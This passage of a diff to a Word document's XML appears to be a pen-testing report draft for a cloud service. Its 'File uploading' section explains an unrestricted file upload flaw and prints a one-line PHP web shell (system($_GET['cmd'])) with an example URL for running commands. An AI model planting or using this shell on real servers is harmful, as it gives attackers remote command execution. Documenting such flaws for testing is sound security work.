+                                      <w:br/>
+                                      <w:t>When you’re ready to add your content, just click here and start typing.]</w:t>
+                                    </w:r>
+                                  </w:p>
+                                </w:sdtContent>
+                              </w:sdt>
+                            </w:txbxContent>
+                          </wps:txbx>
+                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="1600200" tIns="0" rIns="685800" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                            <a:prstTxWarp prst="textNoShape">
+                              <a:avLst/>
+                            </a:prstTxWarp>
+                            <a:spAutoFit/>
+                          </wps:bodyPr>
+                        </wps:wsp>
+                      </a:graphicData>
+                    </a:graphic>
+                    <wp14:sizeRelH relativeFrom="page">
+                      <wp14:pctWidth>94100</wp14:pctWidth>
+                    </wp14:sizeRelH>
+                    <wp14:sizeRelV relativeFrom="page">
+                      <wp14:pctHeight>10000</wp14:pctHeight>
+                    </wp14:sizeRelV>
+                  </wp:anchor>
+                </w:drawing>
+              </mc:Choice>
+              <mc:Fallback>
+                <w:pict>
+                  <v:shape id="Text Box 153" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:79.5pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:100;mso-top-percent:700;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:100;mso-top-percent:700;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                    <v:textbox style="mso-fit-shape-to-text:t" inset="126pt,0,54pt,0">
+                      <w:txbxContent>
+                        <w:p>
+                          <w:pPr>
+                            <w:pStyle w:val="NoSpacing"/>
+                            <w:jc w:val="right"/>
+                            <w:rPr>
+                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                              <w:sz w:val="28"/>
+                              <w:szCs w:val="28"/>
+                            </w:rPr>
+                          </w:pPr>
+                          <w:r>
+                            <w:rPr>
+                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                              <w:sz w:val="28"/>
+                              <w:szCs w:val="28"/>
+                            </w:rPr>
+                            <w:t>Abstract</w:t>
+                          </w:r>
+                        </w:p>
+                        <w:sdt>
+                          <w:sdtPr>
+                            <w:rPr>
+                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                              <w:sz w:val="20"/>
+                              <w:szCs w:val="20"/>
+                            </w:rPr>
+                            <w:alias w:val="Abstract"/>
+                            <w:tag w:val=""/>
+                            <w:id w:val="1375273687"/>
+                            <w:showingPlcHdr/>
+                            <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
+                            <w:text w:multiLine="1"/>
+                          </w:sdtPr>
+                          <w:sdtContent>
+                            <w:p>
+                              <w:pPr>
+                                <w:pStyle w:val="NoSpacing"/>
+                                <w:jc w:val="right"/>
+                                <w:rPr>
+                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                  <w:sz w:val="20"/>
+                                  <w:szCs w:val="20"/>
+                                </w:rPr>
+                              </w:pPr>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                  <w:sz w:val="20"/>
+                                  <w:szCs w:val="20"/>
+                                </w:rPr>
+                                <w:t xml:space="preserve">[Draw your reader in with an engaging abstract. It is typically a short summary of the document. </w:t>
+                              </w:r>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                  <w:sz w:val="20"/>
+                                  <w:szCs w:val="20"/>
+                                </w:rPr>
+                                <w:br/>
+                                <w:t>When you’re ready to add your content, just click here and start typing.]</w:t>
+                              </w:r>
+                            </w:p>
+                          </w:sdtContent>
+                        </w:sdt>
+                      </w:txbxContent>
+                    </v:textbox>
+                    <w10:wrap type="square" anchorx="page" anchory="page"/>
+                  </v:shape>
+                </w:pict>
+              </mc:Fallback>
+            </mc:AlternateContent>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <mc:AlternateContent>
+              <mc:Choice Requires="wps">
+                <w:drawing>
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                    <wp:simplePos x="0" y="0"/>
+                    <wp:positionH relativeFrom="page">
+                      <wp:align>center</wp:align>
+                    </wp:positionH>
+                    <mc:AlternateContent>
+                      <mc:Choice Requires="wp14">
+                        <wp:positionV relativeFrom="page">
+                          <wp14:pctPosVOffset>30000</wp14:pctPosVOffset>
+                        </wp:positionV>
+                      </mc:Choice>
+                      <mc:Fallback>
+                        <wp:positionV relativeFrom="page">
+                          <wp:posOffset>3017520</wp:posOffset>
+                        </wp:positionV>
+                      </mc:Fallback>
+                    </mc:AlternateContent>
+                    <wp:extent cx="7315200" cy="3638550"/>
+                    <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+                    <wp:wrapSquare wrapText="bothSides"/>
+                    <wp:docPr id="154" name="Text Box 154"/>
+                    <wp:cNvGraphicFramePr/>
+                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                        <wps:wsp>
+                          <wps:cNvSpPr txBox="1"/>
+                          <wps:spPr>
+                            <a:xfrm>
+                              <a:off x="0" y="0"/>
+                              <a:ext cx="7315200" cy="3638550"/>
+                            </a:xfrm>
+                            <a:prstGeom prst="rect">
+                              <a:avLst/>
+                            </a:prstGeom>
+                            <a:noFill/>
+                            <a:ln w="6350">
+                              <a:noFill/>
+                            </a:ln>
+                            <a:effectLst/>
+                          </wps:spPr>
+                          <wps:style>
+                            <a:lnRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:lnRef>
+                            <a:fillRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:fillRef>
+                            <a:effectRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:effectRef>
+                            <a:fontRef idx="minor">
+                              <a:schemeClr val="dk1"/>
+                            </a:fontRef>
+                          </wps:style>
+                          <wps:txbx>
+                            <w:txbxContent>
+                              <w:p>
+                                <w:pPr>
+                                  <w:jc w:val="right"/>
+                                  <w:rPr>
+                                    <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                    <w:sz w:val="64"/>
+                                    <w:szCs w:val="64"/>
+                                  </w:rPr>
+                                </w:pPr>
+                                <w:sdt>
+                                  <w:sdtPr>
+                                    <w:rPr>
+                                      <w:caps/>
+                                      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                      <w:sz w:val="64"/>
+                                      <w:szCs w:val="64"/>
+                                    </w:rPr>
+                                    <w:alias w:val="Title"/>
+                                    <w:tag w:val=""/>
+                                    <w:id w:val="630141079"/>
+                                    <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+                                    <w:text w:multiLine="1"/>
+                                  </w:sdtPr>
+                                  <w:sdtEndPr>
+                                    <w:rPr>
+                                      <w:caps w:val="0"/>
+                                    </w:rPr>
+                                  </w:sdtEndPr>
+                                  <w:sdtContent>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:caps/>
+                                        <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                        <w:sz w:val="64"/>
+                                        <w:szCs w:val="64"/>
+                                      </w:rPr>
+                                      <w:t>Pen-testing</w:t>
+                                    </w:r>
+                                  </w:sdtContent>
+                                </w:sdt>
+                              </w:p>
+                              <w:sdt>
+                                <w:sdtPr>
+                                  <w:rPr>
+                                    <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                    <w:sz w:val="36"/>
+                                    <w:szCs w:val="36"/>
+                                  </w:rPr>
+                                  <w:alias w:val="Subtitle"/>
+                                  <w:tag w:val=""/>
+                                  <w:id w:val="1759551507"/>
+                                  <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+                                  <w:text/>
+                                </w:sdtPr>
+                                <w:sdtContent>
+                                  <w:p>
+                                    <w:pPr>
+                                      <w:jc w:val="right"/>
+                                      <w:rPr>
+                                        <w:smallCaps/>
+                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                        <w:sz w:val="36"/>
+                                        <w:szCs w:val="36"/>
+                                      </w:rPr>
+                                    </w:pPr>
+                                    <w:r>
+                                      <w:rPr>
+                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                        <w:sz w:val="36"/>
+                                        <w:szCs w:val="36"/>
+                                      </w:rPr>
+                                      <w:t>Cloud Service</w:t>
+                                    </w:r>
+                                  </w:p>
+                                </w:sdtContent>
+                              </w:sdt>
+                            </w:txbxContent>
+                          </wps:txbx>
+                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="1600200" tIns="0" rIns="685800" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                            <a:prstTxWarp prst="textNoShape">
+                              <a:avLst/>
+                            </a:prstTxWarp>
+                            <a:noAutofit/>
+                          </wps:bodyPr>
+                        </wps:wsp>
+                      </a:graphicData>
+                    </a:graphic>
+                    <wp14:sizeRelH relativeFrom="page">
+                      <wp14:pctWidth>94100</wp14:pctWidth>
+                    </wp14:sizeRelH>
+                    <wp14:sizeRelV relativeFrom="page">
+                      <wp14:pctHeight>36300</wp14:pctHeight>
+                    </wp14:sizeRelV>
+                  </wp:anchor>
+                </w:drawing>
+              </mc:Choice>
+              <mc:Fallback>
+                <w:pict>
+                  <v:shape id="Text Box 154" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:8in;height:286.5pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:941;mso-height-percent:363;mso-top-percent:300;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;mso-width-percent:941;mso-height-percent:363;mso-top-percent:300;mso-width-relative:page;mso-height-relative:page;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                    <v:textbox inset="126pt,0,54pt,0">
+                      <w:txbxContent>
+                        <w:p>
+                          <w:pPr>
+                            <w:jc w:val="right"/>
+                            <w:rPr>
+                              <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                              <w:sz w:val="64"/>
+                              <w:szCs w:val="64"/>
+                            </w:rPr>
+                          </w:pPr>
+                          <w:sdt>
+                            <w:sdtPr>
+                              <w:rPr>
+                                <w:caps/>
+                                <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                <w:sz w:val="64"/>
+                                <w:szCs w:val="64"/>
+                              </w:rPr>
+                              <w:alias w:val="Title"/>
+                              <w:tag w:val=""/>
+                              <w:id w:val="630141079"/>
+                              <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+                              <w:text w:multiLine="1"/>
+                            </w:sdtPr>
+                            <w:sdtEndPr>
+                              <w:rPr>
+                                <w:caps w:val="0"/>
+                              </w:rPr>
+                            </w:sdtEndPr>
+                            <w:sdtContent>
+                              <w:r>
+                                <w:rPr>
+                                  <w:caps/>
+                                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+                                  <w:sz w:val="64"/>
+                                  <w:szCs w:val="64"/>
+                                </w:rPr>
+                                <w:t>Pen-testing</w:t>
+                              </w:r>
+                            </w:sdtContent>
+                          </w:sdt>
+                        </w:p>
+                        <w:sdt>
+                          <w:sdtPr>
+                            <w:rPr>
+                              <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                              <w:sz w:val="36"/>
+                              <w:szCs w:val="36"/>
+                            </w:rPr>
+                            <w:alias w:val="Subtitle"/>
+                            <w:tag w:val=""/>
+                            <w:id w:val="1759551507"/>
+                            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
+                            <w:text/>
+                          </w:sdtPr>
+                          <w:sdtContent>
+                            <w:p>
+                              <w:pPr>
+                                <w:jc w:val="right"/>
+                                <w:rPr>
+                                  <w:smallCaps/>
+                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                  <w:sz w:val="36"/>
+                                  <w:szCs w:val="36"/>
+                                </w:rPr>
+                              </w:pPr>
+                              <w:r>
+                                <w:rPr>
+                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
+                                  <w:sz w:val="36"/>
+                                  <w:szCs w:val="36"/>
+                                </w:rPr>
+                                <w:t>Cloud Service</w:t>
+                              </w:r>
+                            </w:p>
+                          </w:sdtContent>
+                        </w:sdt>
+                      </w:txbxContent>
+                    </v:textbox>
+                    <w10:wrap type="square" anchorx="page" anchory="page"/>
+                  </v:shape>
+                </w:pict>
+              </mc:Fallback>
+            </mc:AlternateContent>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:r>
+            <w:br w:type="page"/>
+          </w:r>
+        </w:p>
+      </w:sdtContent>
+    </w:sdt>
+    <w:sdt>
+      <w:sdtPr>
+        <w:id w:val="646629325"/>
+        <w:docPartObj>
+          <w:docPartGallery w:val="Table of Contents"/>
+          <w:docPartUnique/>
+        </w:docPartObj>
+      </w:sdtPr>
+      <w:sdtEndPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:sdtEndPr>
+      <w:sdtContent>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOCHeading"/>
+          </w:pPr>
+          <w:r>
+            <w:t>Table of Contents</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:hyperlink w:anchor="_Toc464122883" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>File uploading</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc464122883 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:b/>
+              <w:bCs/>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:bCs/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:p>
+      </w:sdtContent>
+    </w:sdt>
     <w:p>
       <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc464122883"/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>File uploading</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">The problem with the </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>malicious.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t xml:space="preserve">Since this filename ends in </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>".php</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>&lt;?php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>system($_GET['cmd']);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="AA0000"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
+        </w:rPr>
+        <w:t>http://</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="AA0000"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
+        </w:rPr>
+        <w:t>serveraddress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="AA0000"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="AA0000"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
+        </w:rPr>
+        <w:t>uploads</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:color w:val="AA0000"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
+        </w:rPr>
+        <w:t>/malicious.php?cmd=ls%20-l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="768BC1DD" wp14:editId="62D0434A">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F7C0C7" wp14:editId="2A93A849">
             <wp:extent cx="5943600" cy="3343275"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="1" name="Picture 1"/>
@@ -23,7 +1338,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -43,17 +1358,114 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgNumType w:start="0"/>
       <w:cols w:space="720"/>
+      <w:titlePg/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0C111D9F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E4C601E8"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -450,6 +1862,49 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading1Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="00B24C54"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="240" w:after="0"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
